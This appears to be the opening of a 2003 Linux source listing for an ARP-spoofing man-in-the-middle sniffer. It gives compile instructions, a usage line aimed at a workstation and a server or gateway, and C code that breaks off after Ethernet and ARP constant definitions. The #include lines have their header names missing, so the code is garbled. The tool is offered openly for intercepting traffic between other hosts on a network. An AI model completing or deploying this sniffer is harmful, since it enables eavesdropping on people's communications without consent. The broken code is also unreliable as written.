Arp Sniffer在linux下面的具体实现

Coder:  Paris-ye
Released on: 1/9/2003
Test on: redhat 9.0
This is a arp spoof sniffer.
W <--- workstation
B <--- Server or  GateWay
M <--- Man in the middle (agent),self IP address
first you must install "pcap" and "libnet"
gcc -I/usr/local/include -L/usr/local/lib -o sniffer sniffer.c -lpcap -lnet
./sniffer -I [Interface] -M [Self IP] -W [Workstation IP] -S [Server IP] -P [port]
#include ;
#include ;
#include ;
#include ;
#include ;
#define  MAXBUF 1024*4
#define  PCAP_TOUT 5
#define  PROMISC 0
#define  TRUE 1
#define  FALSE 0
/* Ethernet protocol IDs */    
#define ETHERTYPE_PUP           0x0200          /* Xerox PUP */
#define ETHERTYPE_IP            0x0800          /* IP */
#define ETHERTYPE_ARP           0x0806          /* Address resolution */
#define ETHERTYPE_REVARP        0x8035          /* Reverse ARP */
/* This structure defines an ethernet arp header.  */
/* ARP protocol opcodes. */
#define ARPOP_REQUEST   1               /* ARP request.  */
#define ARPOP_REPLY     2               /* ARP reply.  */
#define ARPOP_RREQUEST  3               /* RARP request.  */
#define ARPOP_RREPLY    4               /* RARP reply.  */
#define ARPOP_InREQUEST 8               /* InARP request.  */
#define ARPOP_InREPLY   9               /* InARP reply.  */
#define ARPOP_NAK       10              /* (ATM)ARP NAK.  */
/* ARP protocol HARDWARE identifiers. */
#define ARPHRD_NETROM   0               /* From KA9Q: NET/ROM pseudo. */
#define ARPHRD_ETHER    1               /* Ethernet 10/100Mbps.  */
#define ARPHRD_EETHER   2               /* Experimental Ethernet.  */
#define ARPHRD_AX25     3               /* AX.25 Level 2.  */
#define ARPHRD_PRONET   4               /* PROnet token ring.  */
#define ARPHRD_CHAOS    5               /* Chaosnet.  */
#define ARPHRD_IEEE802  6               /* IEEE 802.2 Ethernet/TR/TB.  */
#define ARPHRD_ARCNET   7               /* ARCnet.  */
#define ARPHRD_APPLETLK 8               /* APPLEtalk.  */
#define ARPHRD_DLCI     15              /* Frame Relay DLCI.  */
#define ARPHRD_ATM      19              /* ATM.  */
#define ARPHRD_METRICOM 23              /* Metricom STRIP (new IANA id).  */
/* Dummy types for non ARP hardware */
#define ARPHRD_SLIP       0x256
#define ARPHRD_CSLIP      0x257
#define ARPHRD_SLIP6      0x258
#define ARPHRD_CSLIP6     0x259
#define ARPHRD_RSRVD      0x260             /* Notional KISS type.  */
#define ARPHRD_ADAPT      0x264
#define ARPHRD_ROSE       0x270 
#define ARPHRD_X25        0x271             /* CCITT X.25.  */
#define ARPHDR_HWX25      0x272             /* Boards with X.25 in firmware.  */
#define ARPHRD_PPP        0x512
#define ARPHRD_CISCO      0x513             /* Cisco HDLC.  */
#define ARPHRD_LAPB       0x516             /* LAPB.  */
#define ARPHRD_DDCMP      0x517             /* Digitals DDCMP.  */
#define ARPHRD_RAWHDLC    0x518             /* Raw HDLC.  */

#define ARPHRD_TUNNEL     0x768             /* IPIP tunnel.  */
#define ARPHRD_TUNNEL6    0x769             /* IPIP6 tunnel.  */
#define ARPHRD_FRAD       0x770             /* Frame Relay Access Device.  */
#define ARPHRD_SKIP       0x771             /* SKIP vif.  */
#define ARPHRD_LOOPBACK   0x772             /* Loopback device.  */
#define ARPHRD_LOCALTLK   0x773             /* Localtalk device.  */
#define ARPHRD_FDDI       0x774             /* Fiber Distributed Data Interface. */
#define ARPHRD_BIF        0x775             /* AP1000 BIF.  */ 
#define ARPHRD_SIT        0x776             /* sit0 device - IPv6-in-IPv4.  */
#define ARPHRD_IPDDP      0x777             /* IP-in-DDP tunnel.  */
#define ARPHRD_IPGRE      0x778 

